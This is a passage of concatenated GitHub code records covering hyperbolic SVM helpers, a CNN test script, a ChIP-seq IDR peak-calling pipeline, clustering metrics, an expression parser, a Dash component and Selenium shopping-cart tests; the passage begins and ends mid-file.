1:]\n\n    sqrt_term = np.float64(1.0 + z**2)\n    w_grad_misclass = missed * -(1. / np.sqrt(sqrt_term)) * y * x_grad_misclass\n\n    w_grad = w_grad_margin + C * np.sum(w_grad_misclass, 0)\n\n    return w_grad\n\n\ndef is_feasible(w):\n    \"\"\"\n    Mink prod of weights should be less than 0\n\n    \"\"\"\n    # match the documented constraint: the normal vector must satisfy <w, w>_M < 0\n    return (mink_prod(w, w) < 0).ravel().item()\n\n\ndef project_weight(w, alpha, ep=1e-5):\n    \"\"\"\n    This function can be minimized to find the smallest alpha, which projects\n    weights to the closest point so that w * w = -1 (minkowski)\n\n    \"\"\"\n    new_w = w.copy()\n    new_w[1:] = (1 + alpha) * new_w[1:]\n    new_w[0] = np.sqrt(np.sum((new_w[1:] - ep)**2))\n\n    return new_w\n\n\n# =============\n# POINCARE BALL\n# =============\n\ndef mobius_addition(x, y, c=1.0):\n    \"\"\"\n    Mobius addition in the poincare ball model\n\n    \"\"\"\n    xx = np.sum(x*x)\n    yy = np.sum(y*y)\n    xy = np.sum(x*y)\n\n    numerator = (1 + 2*c*xy + c*yy)*x + (1 - c*xx)*y\n    denominator = 1 + 2*c*xy + c*c*xx*yy\n\n    return numerator/denominator\n\n\ndef project_to_unitball(x, eps=1e-5):\n    \"\"\"\n    If norm of x >= 1, scale x back so that it lies just inside the poincare ball\n\n    \"\"\"\n    if np.sum(x*x) < 1:\n        return x\n\n    x_norm = np.sqrt(np.sum(x*x))\n    x = x/x_norm - eps\n\n    return x\n\n\ndef ball_dist(x, y):\n    xx = np.sum(x*x)\n    yy = np.sum(y*y)\n    x_minus_y = x - y\n    x_minus_y2 = np.sum(x_minus_y*x_minus_y)\n\n    arg = 2*(x_minus_y2)/((1 - xx)*(1 - yy))\n\n    return np.arccosh(1 + arg)\n\n\ndef poincare_metric(x):\n    \"\"\"\n    Poincare metric of x, i.e., inner product of x. 
x shape should be 1 x d\n\n    \"\"\"\n    x_new = x.copy().reshape(1, -1)\n    euc_inner = np.sum(x_new**2)\n    conformal_factor = 2 / (1 - euc_inner)\n\n    return conformal_factor**2 * euc_inner\n","repo_name":"plumdeq/hsvm","sub_path":"htools.py","file_name":"htools.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"}
{"seq_id":"3436261198","text":"from torch.utils.data import DataLoader\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch\nfrom model.cnn import CNN\nfrom model.cnn_v2 import CNN_V2\nimport visdom\n\nvis = visdom.Visdom()\n\n# vis.text('Hello, World!', env=\"main\")\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n# device = 'cpu'\n\ntorch.manual_seed(777)\nif device == 'cuda':\n    torch.cuda.manual_seed_all(777)\n\n# model = CNN().to(device)\n# model.load_state_dict(torch.load('./model.pth'))\nmodel_v2 = CNN_V2().to(device)\nmodel_v2.load_state_dict(torch.load('./model_v2.pth'))\n# # print(model.layer1[0])\n# # print(new_model.layer1[0])\n# #\n# # print(model.layer1[0].weight[0][0][0])\n# # print(new_model.layer1[0].weight[0][0][0])\n\ntrans = torchvision.transforms.Compose([\n    transforms.ToTensor(),\n])\ntest_data = torchvision.datasets.ImageFolder(root='../data/custom_data/test_data', transform=trans)\ntest_set = DataLoader(dataset=test_data, batch_size=len(test_data))\n# test_set = DataLoader(dataset=test_data)\ncheck_list = []\n\n# test\nwith torch.no_grad():\n    for num, data in enumerate(test_set):\n        imgs, label = data\n\n        imgs = imgs.to(device)\n        label = label.to(device)\n\n        prediction = model_v2(imgs)\n\n        correct_prediction = torch.argmax(prediction, 1) == label\n        check_list = correct_prediction.data.cpu().numpy()\n        accuracy = correct_prediction.float().mean()\n        print(f'Accuracy:{accuracy.item()}')\n\n# check image on visdom\nzero_list = []\nfor num, value in enumerate(check_list):\n    if not value:\n        zero_list.append(num)\n\nprint(zero_list)\nfor num, data in enumerate(test_set):\n    imgs, label = data\n    for idx, img in enumerate(imgs):\n        if idx in zero_list:\n            print(idx)\n            vis.images(img, env='main')\n","repo_name":"whayoung27/AI-Burning-Day_Result","sub_path":"[web][No_Chickens][영일이]/ETC/AI/model/cnn_test.py","file_name":"cnn_test.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"}
{"seq_id":"4704090413","text":"'''PipelineIDR.py - Tasks for IDR analysis\n=============================================\n\nReference\n---------\n'''\n\nimport os\nimport re\nimport pysam\nimport random\n\nimport CGATPipelines.Pipeline as P\nimport CGAT.IOTools as IOTools\nimport CGATPipelines.PipelineTracks as PipelineTracks\nfrom CGAT import WrapperIDR\n\n\ndef splitBam(infile, outfile_stub, params):\n    pysam_in = pysam.Samfile(infile, \"rb\")\n    n_outfiles = int(params[0])\n\n    outfile_handles = []\n    outfile_names = []\n\n    # create list of upper bounds for intervals\n    intervals = []\n    lower = 0\n    for i in range(n_outfiles):\n        upper = lower + 1.0 / n_outfiles\n        intervals.append(upper)\n        # add an outfile handle to list of outfile handles\n        outf = outfile_stub + \"_\" + str(i).zfill(2) + \".bam\"\n        outfile_handles.append(pysam.Samfile(outf, \"wb\", template=pysam_in))\n        # record the name so the file can be indexed after writing\n        outfile_names.append(outf)\n        lower = upper\n\n    # iterate through reads in samfile and write them to an outfile at random\n    for read in pysam_in.fetch():\n        r_num = random.random()\n        for i in range(len(intervals)):\n            if r_num < intervals[i]:\n
outfile_handles[i].write(read)\n break\n else:\n continue\n\n # close outfiles\n for i in range(n_outfiles):\n outfile_handles[i].close()\n\n # index outfiles (pysam.index() throws an error)\n for split_sam in outfile_names:\n to_cluster = False\n statement = (\"samtools index %(split_sam)s\")\n P.run()\n\n\ndef filterBadLibraries(infiles, bad_samples):\n \"\"\"\n Takes a list of infiles, removes those files that match any pattern in list\n of bad_samples, returns the filtered list of outfiles\n \"\"\"\n bad_samples = [re.compile(x) for x in bad_samples]\n to_remove = []\n for inf in infiles:\n for regex in bad_samples:\n if regex.search(str(inf)):\n to_remove.append(inf)\n return to_remove\n\n\ndef mergeBams(infile_list, outfile):\n infile_list = \" \".join(infile_list)\n job_memory = \"5G\"\n statement = (\"samtools merge - %(infile_list)s\"\n \" | samtools sort - -o %(outfile)s\"\n \" 2>%(outfile)s.log;\"\n \" checkpoint;\"\n \" samtools index %(outfile)s\"\n \" 2>%(outfile)s.bai.log\")\n P.run()\n\n##########################################################################\n##########################################################################\n##########################################################################\n# Run Peak Calling For IDR\n##########################################################################\n\n\ndef callIDRPeaks(infile,\n outfile,\n peak_caller,\n control_option,\n PARAMS_PEAKCALLER,\n pseudoreplicate=False):\n\n # select peak caller to use\n if peak_caller == \"macs2\":\n caller = macs2IDRPeaks(control_option, PARAMS_PEAKCALLER)\n elif peak_caller == \"spp\":\n caller = sppIDRPeaks(control_option, PARAMS_PEAKCALLER)\n else:\n raise ValueError(\"Unrecognized peak-caller: %s\" % peak_caller)\n\n caller.run(infile, outfile, pseudoreplicate)\n\n\nclass callerIDRPeaks(object):\n\n \"\"\"\n Generic class for handling peak calling for IDR analysis\n \"\"\"\n\n def __init__(self, control_option, PARAMS_PEAKCALLER):\n self.control_option = control_option\n self.PARAMS_PEAKCALLER = PARAMS_PEAKCALLER\n\n def getControlfile(self, track):\n \"\"\"\n Return appropriate input file for a track.\n For pooled tracks (R0), will always return a pooled input file.\n If options set to pooled, will return a pooled input for all tracks.\n If options set to single, will return first input replicate (R1).\n If options set to matched, will return input with matching replicate.\n Otherwise will return ValueError\n \"\"\"\n n = track.clone()\n # is hardcoded into regex for ruffus tasks\n n.data[\"attribute1\"] = \"input\"\n\n if n.replicate == \"R0\":\n # if track is pooled, then select pooled input\n control = os.path.basename(\"%s.bam\" % n.asFile())\n control = os.path.join(\"./bamfiles_pooled\", control)\n elif self.control_option == \"pool\":\n # if all controls are pooled, then select pooled input\n n.replicate = \"R0\"\n control = os.path.basename(\"%s.bam\" % n.asFile())\n control = os.path.join(\"./bamfiles_pooled\", control)\n elif self.control_option == \"single\":\n # if only one input file available, select it\n n.replicate = \"R1\"\n control = os.path.basename(\"%s.bam\" % n.asFile())\n control = os.path.join(\"./bamfiles_filtered\", control)\n elif self.control_option == \"matching\":\n # otherwise, select input with matching replicate\n control = os.path.basename(\"%s.bam\" % n.asFile())\n control = os.path.join(\"bamfiles_filtered\", control)\n else:\n raise ValueError(\"Unrecognised option_control %s\"\n \" must be either pooled, single, or matching\")\n\n if not 
os.path.exists(control):\n raise IOError(\"Control file is missing: %s\" % control)\n\n return control\n\n def getRunStatement(self, infile, outfile, controlfile):\n \"\"\"\n Generate a specific run statement for each peakcaller class\n \"\"\"\n return \"\"\n\n def postProcess(self, infile, outfile, controlfile):\n \"\"\"\n Generate a specific post process statement for each peakcaller class\n that generates an outfile in the format required by IDR\n \"\"\"\n return \"\"\n\n def run(self, infile, outfile, pseudoreplicate):\n \"\"\"\n Gets gets appropriate input\n Generates a run statement\n Submits job\n Runs post processing steps for IDR\n \"\"\"\n\n # get appropriate input\n Sample = PipelineTracks.AutoSample\n if pseudoreplicate:\n try:\n track = P.snip(infile, \"_00.bam\")\n except:\n track = P.snip(infile, \"_01.bam\")\n else:\n track = P.snip(infile, \".bam\")\n controlfile = self.getControlfile(Sample(track))\n\n # following bugfix, check input file actually contains word 'input'\n assert re.search(\"input\", os.path.basename(controlfile)), \\\n \"Input file doesn't contain 'input' in name: %s\" % controlfile\n\n # run peakcalling\n statement = self.getRunStatement(infile, outfile, controlfile)\n # check run statement\n # print (\"\\nRun statement for sample %s :\\n %s\" % (infile, statement))\n job_memory = \"10G\"\n P.run()\n\n # post process peakcalling results\n ignore_pipe_errors = True\n statement = self.postProcess(infile, outfile, controlfile)\n # check post process statement\n # print (\"\\nPost-process statement for sample %s :\"\n # \"\\n %s\" % (infile, statement))\n if statement:\n P.run()\n else:\n pass\n\n\nclass macs2IDRPeaks(callerIDRPeaks):\n\n \"\"\"\n \"\"\"\n\n def getRunStatement(self, infile, outfile, controlfile):\n \"\"\"\n Generate a specific run statement for each peakcaller class\n \"\"\"\n\n # generate outfile prefix\n dir_name = os.path.dirname(outfile)\n infile_stub = P.snip(os.path.basename(infile), \".bam\")\n control_stub = P.snip(os.path.basename(controlfile), \".bam\")\n outfile_stub = infile_stub + \"_VS_\" + control_stub\n outfile_stub = os.path.join(dir_name, outfile_stub)\n\n # build macs2 commandline statement\n statement = [(\"macs2 callpeak\"\n \" --treatment %(infile)s\"\n \" --control %(controlfile)s\"\n \" --verbose=10\")]\n\n # add additional parameters\n # currently the input read format has to be bam bc of ruffus regex\n statement.append(\"--format BAM\")\n statement.append(\"--name %s\" % outfile_stub)\n # require genome size, if it is not specified try to take from genome\n if not re.search(\"-g\\s|--gsize\",\n self.PARAMS_PEAKCALLER[\"macs2_options_parameters\"]):\n statement.append(\n \"--gsize %s\" % self.PARAMS_PEAKCALLER[\n \"macs2_options_genome_prefix\"][:2])\n\n # set threshold for lax peak calling\n if self.PARAMS_PEAKCALLER[\"macs2_options_fdr\"]:\n if self.PARAMS_PEAKCALLER[\"macs2_options_pvalue\"]:\n raise Exception(\"Value specified for both macs2 options\"\n \" -pvalue and -fdr please select one or\"\n \" other option, but not both\")\n else:\n threshold = \"--qvalue \" + \\\n str(self.PARAMS_PEAKCALLER[\"macs2_options_fdr\"])\n elif self.PARAMS_PEAKCALLER[\"macs2_options_pvalue\"]:\n threshold = \"--pvalue=\" + \\\n str(self.PARAMS_PEAKCALLER[\"macs2_options_pvalue\"])\n else:\n raise Exception(\"Must specify a value for either\"\n \" macs2_options_pvalue or macs2_options_fdr,\"\n \" but not both\")\n statement.append(threshold)\n\n # deal with duplicate reads\n if 
self.PARAMS_PEAKCALLER[\"macs2_options_keep_duplicates\"]:\n statement.append(\n \"--keep-dup %s\" % self.PARAMS_PEAKCALLER[\n \"macs2_options_keep_duplicates\"])\n\n # add additional parameters\n statement.append(self.PARAMS_PEAKCALLER[\"macs2_options_parameters\"])\n\n # write log information to sentinel file\n statement.append(\">& %(outfile)s\")\n\n statement = (\" \".join(statement) % locals())\n\n return statement\n\n def postProcess(self, infile, outfile, controlfile):\n \"\"\"\n Takes the narrowPeak files output by macs2.\n If macs2 given pvalue, then sorts by column 8 (-log10(pval))\n If macs2 given fdr, then sorts by column 9 (-log10(qval)).\n Generates a regionPeak File in the format required for IDR analysis\n N.B. IDR pipeline expects macs2 to output .encodePeak file, whereas it\n actually outputs a .narrowPeak file.\n \"\"\"\n # generate outfile prefix\n dir_name = os.path.dirname(outfile)\n infile_stub = P.snip(os.path.basename(infile), \".bam\")\n control_stub = P.snip(os.path.basename(controlfile), \".bam\")\n outfile_stub = infile_stub + \"_VS_\" + control_stub\n outfile_stub = os.path.join(dir_name, outfile_stub)\n\n # set up sort statement\n if self.PARAMS_PEAKCALLER[\"macs2_options_pvalue\"]:\n sort_column = \"8nr,8nr\"\n else:\n sort_column = \"9nr,9nr\" # Check this!\n\n npeaks = self.PARAMS_PEAKCALLER[\"macs2_options_npeaks\"]\n\n # format outfile as required for idr\n statement = [(\"sort\"\n \" -k %(sort_column)s\"\n \" %(outfile_stub)s_peaks.narrowPeak\"\n \" | head -n %(npeaks)s\"\n \" | gzip\"\n \" > %(outfile_stub)s.regionPeak.gz\")]\n # zip the original bedfile\n statement.append(\"; gzip %(outfile_stub)s_peaks.narrowPeak\")\n # zip the excel file\n statement.append(\"; gzip %(outfile_stub)s_peaks.xls\")\n # zip the summits file\n statement.append(\"; gzip %(outfile_stub)s_summits.bed\")\n # create statement\n statement = (\"\".join(statement) % locals())\n\n return statement\n\n\nclass sppIDRPeaks(callerIDRPeaks):\n\n \"\"\"\n Class for calling IDR peaks using spp.\n No postprocessing is run because spp outputs files in the format required\n for IDR\n \"\"\"\n\n def getRunStatement(self, infile, outfile, controlfile):\n \"\"\"\n Generate a specific run statement for each peakcaller class\n \"\"\"\n # select location of the spp script to run\n if self.PARAMS_PEAKCALLER[\"spp_options_idr_script\"] == \"default\":\n executable = IOTools.which(\"run_spp.R\")\n elif self.PARAMS_PEAKCALLER[\"spp_options_idr_script\"] == \"nodups\":\n executable = IOTools.which(\"run_spp_nodups.R\")\n else:\n executable = self.PARAMS_PEAKCALLER[\"spp_options_idr_script\"]\n try:\n os.path.exists(executable)\n except:\n raise IOError(\"SPP script not found: %s\" % executable)\n\n # select the threshold for lax peak calling\n if self.PARAMS_PEAKCALLER[\"spp_options_npeaks\"]:\n if self.PARAMS_PEAKCALLER[\"spp_options_fdr\"]:\n raise Exception(\"Value specified for both SPP options\"\n \" -npeaks and -fdr please select one or\"\n \" other option, but not both\")\n else:\n threshold = \"-npeaks=\" + \\\n str(self.PARAMS_PEAKCALLER[\"spp_options_npeaks\"])\n elif self.PARAMS_PEAKCALLER[\"spp_options_fdr\"]:\n threshold = \"-fdr=\" + \\\n str(self.PARAMS_PEAKCALLER[\"spp_options_fdr\"])\n else:\n raise Exception(\"Must specify a value for either\"\n \" spp_options_npeaks or spp_options_fdr,\"\n \" but not both\")\n\n # build run statement for spp.\n # -savn is output.npeak.file (passed as NULL,\n # means filename based on infile)\n # -out is output.result.file\n # -odir defaults to 
os.path.dirname( infile )\n # -savn is save narrowpeak file\n # -savr is save regionpeak file\n # (run_spp.R script throws an error if region peak is not output).\n statement = [(\"Rscript %(executable)s\"\n \" -c=%(infile)s\"\n \" -i=%(controlfile)s\"\n \" %(threshold)s\"\n \" -savn\"\n \" -savr\")]\n\n # add additional options\n statement.append(self.PARAMS_PEAKCALLER[\"spp_options_parameters\"])\n\n # specify outfile\n # MM: this was hard-coded to a non-existent directory\n # changed to stats directory\n statement.append(\" -rf\"\n \" -out=./stats/phantomPeakStatsReps.tab\"\n \" >& %(outfile)s\")\n\n statement = (\" \".join(statement) % locals())\n\n return statement\n\n##########################################################################\n##########################################################################\n##########################################################################\n# Run IDR analysis\n##########################################################################\n\n\ndef getIDRStatement(infile1,\n infile2,\n outfile,\n overlap_ratio,\n ranking_measure,\n chr_table):\n\n # get outfile stub\n inf1 = os.path.basename(infile1).split(\"_VS_\")[0]\n inf2 = os.path.basename(infile2).split(\"_VS_\")[0]\n out_prefix = os.path.join(os.path.dirname(outfile),\n inf1 + \"_vs_\" + inf2)\n\n idr_wrapper = WrapperIDR.__file__\n\n statement = (\"python %(idr_wrapper)s\"\n \" --action=run\"\n \" --output-prefix=%(out_prefix)s\"\n \" --chromosome-table=%(chr_table)s\"\n \" --signal-value=%(ranking_measure)s\"\n \" --overlap-ratio=%(overlap_ratio)s\"\n \" %(infile1)s\"\n \" %(infile2)s\"\n \" >> %(outfile)s\" % locals())\n\n return statement\n\n\ndef getIDRPlotStatement(infiles, outfile):\n \"\"\"\n Receives list of infiles, the fist of which is a sentinel, the subsequent\n files are *uri.sav files output from run-batch-consistency.r script.\n Returns a run statement for batch-consistency-plot.r as it is wrapped in\n WrapperIDR.py\n \"\"\"\n infile_prefixes = [P.snip(x, \"-uri.sav\") for x in infiles[1:]]\n infile_prefixes = \" \".join(infile_prefixes)\n outfile_prefix = P.snip(outfile, \".pdf\")\n \n idr_wrapper = WrapperIDR.__file__\n\n statement = (\"python %(idr_wrapper)s\"\n \" --action=plot\"\n \" --output-prefix=%(outfile_prefix)s\"\n \" %(infile_prefixes)s;\"\n \" convert\"\n # \" -resize 125%%\" why does this cause an error?\n \" %(outfile_prefix)s.pdf\"\n \" %(outfile_prefix)s.png\" % locals())\n\n return statement\n\n\n##########################################################################\n##########################################################################\n##########################################################################\n# Post Process PeakCalling\n##########################################################################\ndef countPeaks(infiles, outf):\n \"\"\"\n Count the number of peaks in each narrowPeak file\n \"\"\"\n for infile in infiles:\n sample_id = os.path.basename(infile).split(\"_VS_\")[0]\n tissue, condition, replicate = sample_id.split(\"-\")\n experiment = tissue + \"_\" + condition\n n_peaks = str(len(IOTools.openFile(infile).readlines()))\n outf.write(\"\\t\".join([sample_id,\n experiment,\n tissue,\n condition,\n replicate,\n n_peaks]) + \"\\n\")\n outf.close()\n\n##########################################################################\n##########################################################################\n##########################################################################\n# Post Process 
IDR\n##########################################################################\n\n\ndef findNPeaks(infiles, outfile, params):\n outf = IOTools.openFile(outfile, \"w\")\n outf.write(\"Tissue\\t\"\n \"Condition\\t\"\n \"Experiment\\t\"\n \"idr_comp\\t\"\n \"sample_1\\t\"\n \"sample_2\\t\"\n \"n_peaks\\n\")\n idr_threshold = float(params[0])\n\n # Hack: for only one infile, P.submit returns a string rather than a list\n if type(infiles) is str:\n infiles = [infiles, ]\n\n for inf in infiles:\n inf_name = P.snip(os.path.basename(inf), \"-overlapped-peaks.txt\")\n tissue = inf_name.split(\"-\")[0]\n condition = inf_name.split(\"-\")[1]\n experiment = \"_\".join([tissue, condition])\n sample1, sample2 = inf_name.split(\"_vs_\")\n n_peaks = 0\n header = True\n for line in IOTools.openFile(inf):\n if header:\n header = False\n continue\n line = line.split()\n if float(line[10]) <= idr_threshold:\n n_peaks += 1\n else:\n continue\n outf.write(tissue + \"\\t\" +\n condition + \"\\t\" +\n experiment + \"\\t\" +\n inf_name + \"\\t\" +\n sample1 + \"\\t\" +\n sample2 + \"\\t\" +\n str(n_peaks) + \"\\n\")\n\n outf.close()\n","repo_name":"CGATOxford/CGATPipelines","sub_path":"obsolete/PipelineIDR.py","file_name":"PipelineIDR.py","file_ext":"py","file_size_in_byte":19212,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"54"} +{"seq_id":"23997268125","text":"from scipy.stats import gaussian_kde\nfrom scipy.stats import entropy\nfrom scipy.integrate import quad\nimport numpy as np\nfrom sklearn.cluster import AgglomerativeClustering\nfrom utils import *\n\ndef kl_div(dist1, dist2):\n kde1 = gaussian_kde(dist1)\n kde2 = gaussian_kde(dist2)\n def kl_util(i):\n return kde1(i) * np.log(kde1(i) / kde2(i))\n upper_bound = max(max(dist1), max(dist2))\n return quad(kl_util, a=0, b=upper_bound)\n\n# functions for calculating variation of information\n\ndef r_f(labels1, labels2, i, j):\n if len(labels1) != len(labels2):\n print('failure')\n return\n indices1 = get_indices(labels1, i)\n indices2 = get_indices(labels2, j)\n intersection = [item for item in indices1 if item in indices2]\n return len(intersection) / len(labels1)\n\ndef v_i(labels1, labels2):\n summation = 0\n for i in set(labels1):\n for j in set(labels2):\n r_value = r_f(labels1, labels2, i, j)\n p_i = list(labels1).count(i) / len(labels1)\n q_j = list(labels2).count(j) / len(labels1)\n entry = -r_value * (np.log(r_value/p_i) + np.log(r_value/q_j))\n if not np.isnan(entry) and not np.isinf(entry):\n summation += entry\n return summation\n\n# ranking functions\n\ndef rank_vi(data):\n start_labels = AgglomerativeClustering(n_clusters=10).fit_predict(data)\n v_dict = {} # global VI\n cluster_dict = {} # cluster integrity\n for marker in data.columns:\n print(marker)\n new_data = data.drop(marker, axis=1)\n new_clustering = AgglomerativeClustering(n_clusters=10).fit_predict(new_data)\n v_dict[marker] = v_i(start_labels, new_clustering)\n # calculate cluster integrity\n temp = {}\n for cluster in set(start_labels):\n original_indices = get_indices(start_labels, cluster)\n temp[cluster] = entropy(new_clustering[original_indices])\n cluster_dict[marker] = temp\n return v_dict, cluster_dict\n\ndef rank_kl(data, cluster_labels):\n cluster_dict = {}\n data = np.arcsinh(data.drop('Labels', axis=1))\n for marker in data.columns:\n print(marker)\n temp = {}\n for cluster in set(cluster_labels):\n cluster_data = data.iloc[[i for i, item in enumerate(cluster_labels) if item==cluster]]\n kl = kl_div(cluster_data[marker], 
data[marker])\n temp[cluster] = kl[0]\n cluster_dict[marker] = temp\n return cluster_dict","repo_name":"ErolB/ClusterViewer","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15517659073","text":"from typing import Optional\n\nfrom dash import dcc, html\nfrom dash.development.base_component import Component\nfrom dash_bootstrap_components import Container\n\n\n\nclass Dashboard(Container):\n \"\"\"Container principal da aplicação.\n\n Parameters\n ----------\n children : Dash component | list of Dash components, optional\n The container main content.\n navbar : dash_charlotte.Navbar, optional\n Navbar added at the top of the dashboard.\n drawer : dash_charlotte.Drawer, optional\n The dashboard sidenav.\n id : str, default='dashboard'\n Dashboard ID.\n\n Components IDs\n --------------\n {id}\n Container principal.\n {id}--data\n Componente para armazenamento de dados.\n {id}--location\n Componente que gerencia a URL da página.\n\n \"\"\"\n\n def __init__(\n self,\n children: Optional[Component] = None,\n navbar: Optional[Component] = None,\n drawer: Optional[Component] = None,\n id: str = 'dashboard'\n ):\n\n if not isinstance(children, list):\n children = [children]\n\n super().__init__(\n id = id,\n fluid = True,\n className = 'dashboard-container shade7',\n children = [\n dcc.Location(id=f'{id}--location'),\n dcc.Store(id=f'{id}--data'),\n drawer,\n html.Section(\n className = 'home-section',\n children = [navbar] + children\n )\n ]\n )\n","repo_name":"GusFurtado/dash-charlotte","sub_path":"{{cookiecutter.app_name}}/components/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"73291946721","text":"import re\nfrom typing import List\n\nfrom math_operations import Val, Coef, Vector, Sum, Product\n\n\ndef parse_line(line: str):\n \"\"\"Разбирает строковое выражение на объекты из math_operations.py\"\"\"\n s = re.split('( |\\*|\\+|\\n)', line)\n s = list(filter(lambda x: x not in ('', ' ', '\\n'), s))\n return _parse(s)\n\n\ndef _parse(expr: List[str]):\n if len(expr) == 1:\n try:\n return Val(int(expr[0]))\n except ValueError:\n if expr[0] in ('a', 'b', 'c'):\n return Coef(expr[0])\n elif expr[0] in ('e1', 'e2', 'e3', 'e4', 'e5', 'e6', 'e7', 'v0'):\n return Vector(expr[0])\n raise ValueError(expr[0])\n else:\n for i, s in enumerate(expr):\n if s == '+':\n return Sum(_parse(expr[:i]), _parse(expr[i + 1:]))\n for i, s in enumerate(expr):\n if s == '*':\n return Product(_parse(expr[:i]), _parse(expr[i + 1:]))\n return ValueError(expr)\n\n\nif __name__ == '__main__':\n for s in (\n 'a + b',\n 'e1 + 2*e2',\n '0 * e1 - 2*e2',\n '0*e1+-2+e2',\n '0',\n 'v0'\n ):\n parsed = parse_line(s)\n print(s, ':', parsed, type(parsed))\n","repo_name":"chalex2k/Lie_algebra_Jacobi_check","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36711612237","text":"\"\"\"\n# !/usr/bin/env 全部\n# -*- coding: utf-8 -*-\n@Time : 2022/3/24 21:53\n@File : HJ31 单词倒排.py\n\"\"\"\n\n\ndef reverseStence(str):\n \"\"\"\n 描述\n 对字符串中的所有单词进行倒排。\n\n 说明:\n\n 1、构成单词的字符只有26个大写或小写英文字母;\n\n 2、非构成单词的字符均视为单词间隔符;\n\n 3、要求倒排后的单词间隔符以一个空格表示;如果原字符串中相邻单词间有多个间隔符时,倒排转换后也只允许出现一个空格间隔符;\n\n 4、每个单词最长20个字母;\n\n 
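
The kl_div helper in metrics.py above estimates KL divergence by fitting Gaussian KDEs to the two samples and integrating numerically. A self-contained check on synthetic positive-valued data (the gamma parameters are made up purely for illustration):

import numpy as np
from scipy.stats import gaussian_kde
from scipy.integrate import quad

rng = np.random.default_rng(0)
dist1 = rng.gamma(2.0, 2.0, size=500)  # stand-in for one cluster's marker values
dist2 = rng.gamma(4.0, 2.0, size=500)  # stand-in for the full population

kde1, kde2 = gaussian_kde(dist1), gaussian_kde(dist2)

def integrand(x):
    p, q = kde1(x)[0], kde2(x)[0]
    return p * np.log(p / q)

# same [0, max] integration window that kl_div uses
kl, _abs_err = quad(integrand, 0, max(dist1.max(), dist2.max()))
print("estimated KL(dist1 || dist2):", kl)
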
Constraints: the string length n satisfies 1 ≤ n ≤ 10000\n    Input description:\n    One line of input, the sentence whose words are to be reversed\n\n    Output description:\n    The sentence with its words in reverse order\n    :param str: the input sentence\n    :return: the word-reversed sentence\n    \"\"\"\n    str = str.strip()\n    new_str = ''\n    str = ' '+ str\n    r = 0\n    ss = ''\n    for i in range(len(str)-1, -1, -1):\n        s = str[i]\n        if s.isalpha():\n            r += 1\n            ss = str[i:i+r]\n        else:\n            if ss:  # skip runs of consecutive separator characters\n                new_str += ss + ' '\n            r = 0\n            ss = ''\n\n    return new_str.strip()  # drop the trailing separator\n\nprint(reverseStence('I am a student'))\n","repo_name":"linksdl/meta-project-learning_programming_algorithms","sub_path":"牛客-华为机考/字符串/HJ31 单词倒排.py","file_name":"HJ31 单词倒排.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"34574329357","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.expected_conditions import presence_of_element_located\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\n@pytest.fixture(autouse=True)\ndef testing():\n    pytest.driver = webdriver.Chrome('./chromedriver')\n    pytest.driver.get('https://royalfashion.com.ua')\n    yield\n    pytest.driver.quit()\n\n\ndef test_add_item_to_cart():\n    search_page_for_shorts()\n    item1_price = open_item_on_screen('Сірі жіночі шорти в смужку')\n    add_current_item_to_cart()\n    close_cart_dialog()\n\n    assert_cart_contains_items_and_sum(1, item1_price)\n\n\ndef test_add_couple_of_items_to_cart_should_calculate_both():\n    search_page_for_shorts()\n\n    item1_price = open_item_on_screen('Сірі жіночі шорти в смужку')\n    add_current_item_to_cart()\n    close_cart_dialog()\n\n    # adding 2nd item to the cart\n    pytest.driver.get('https://royalfashion.com.ua')\n    search_page_for_shorts()\n\n    item2_price = open_item_on_screen('Темно-сині жіночі спортивні шорти')\n    add_current_item_to_cart()\n    close_cart_dialog()\n\n    assert_cart_contains_items_and_sum(2, item1_price+item2_price)\n\n\ndef test_should_add_1_item_and_then_remove_it_from_the_cart():\n    search_page_for_shorts()\n    item1_price = open_item_on_screen('Сірі жіночі шорти в смужку')\n    add_current_item_to_cart()\n    close_cart_dialog()\n    assert_cart_contains_items_and_sum(1, item1_price)\n\n    open_cart()\n\n    remove_item_from_cart('Сірі жіночі шорти в смужку')\n\n\ndef test_should_add_2_elements_calculate_sum_then_remove_1_and_recalculate():\n    search_page_for_shorts()\n\n    item1_price = open_item_on_screen('Сірі жіночі шорти в смужку')\n    add_current_item_to_cart()\n    close_cart_dialog()\n\n    # adding 2nd item to the cart\n    pytest.driver.get('https://royalfashion.com.ua')\n    search_page_for_shorts()\n\n    item2_price = open_item_on_screen('Темно-сині жіночі спортивні шорти')\n    add_current_item_to_cart()\n    close_cart_dialog()\n\n    assert_cart_contains_items_and_sum(2, item1_price+item2_price)\n\n    open_cart()\n\n    remove_item_from_cart('Сірі жіночі шорти в смужку')\n\n    assert_cart_contains_items_and_sum(1, item2_price)\n\n\n# ------------------------------------------------------------------\n\n\ndef open_cart():\n    cart_button = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.XPATH, '//*[@id=\"menu_basket\"]/a[1]/span[1]')))\n    cart_button.click()\n\n\ndef remove_item_from_cart(item_name):\n    all_items = pytest.driver.find_elements_by_class_name('productslist_item')\n    for every_item in all_items:\n        if item_name.upper() in every_item.text:\n            remove_button = every_item.find_elements_by_class_name('productslist_product_remove')\n            remove_button[0].click()\n            break\n\n\ndef assert_cart_contains_items_and_sum(item_number, total_amount_to_pay):\n    
